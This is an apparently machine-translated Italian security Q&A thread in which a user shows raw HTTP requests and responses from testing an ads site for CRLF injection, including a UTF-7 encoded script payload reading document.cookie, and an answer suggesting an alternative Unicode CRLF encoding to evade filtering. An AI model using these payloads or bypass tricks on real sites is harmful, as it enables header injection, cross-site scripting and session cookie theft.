Come sfruttare l'iniezione CRLF?

2

Stavo eseguendo alcuni test su un sito web quando mi sono imbattuto in questo:

Richiesta:

GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=format%3Dhtml HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0

Una volta inoltrata, la risposta è stata la seguente:

HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328

<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard>redirected</a>.</body></html>

Dopo alcune ore di manipolazione con parametri diversi penso di aver trovato un'iniezione CLRF all'interno del parametro "intended_params = format% 3Dhtml" che cambia l'intestazione della posizione e l'URL di reindirizzamento:

Richiesta:

GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=%0d%0aContentType%3a%20text%2fhtml%3bcharset%3dUTF-7%0d%0aContent-Length%3a%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies%3a%27%2Bdocument%2ecookie%29%2BADw-%2fscript%2BAD4-%2BADw-%2fbody%2BAD4-%2BADw-%2fhtml%2BAD4 HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0

Risposta:

HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328

<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4">redirected</a>.</body></html>

Questo comportamento è sfruttabile in ogni caso? puoi usarlo per impostare cookie o causare la risposta allo split HTTP?

Grazie in anticipo.

    
posta Mico 10.05.2015 - 11:12
fonte

1 risposta

2

Come ha detto @Gumbo, CRLF è correttamente codificato con% 0d% 0a nell'URL risultante, come puoi vedere. Se avessi impostato le intestazioni come avevi passato come parametri, avresti visto quelle intestazioni separatamente. Puoi provare invece una codifica diversa, come % E5% 98% 8A% E5% 98% 8D :)

The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.

Se sei in grado di dividere la risposta, puoi eseguire altri exploit come definito qui . Questo spiega quali attacchi si possono eseguire se è in grado di manipolare le intestazioni HTTP.

Le intestazioni sono separate da un CRLF e le intestazioni della risposta sono separate dal suo corpo per due, consentendoti di inserire il tuo contenuto di spoofing.

Poiché la risposta è 302, tuttavia, è molto difficile da sfruttare. Tuttavia, potresti trovare interessante quanto segue, per favore dare un'occhiata.
link
L'autore è riuscito a attivare XSS in IE, nonostante il reindirizzamento 302.

    
risposta data 11.05.2015 - 02:15
fonte

Leggi altre domande sui tag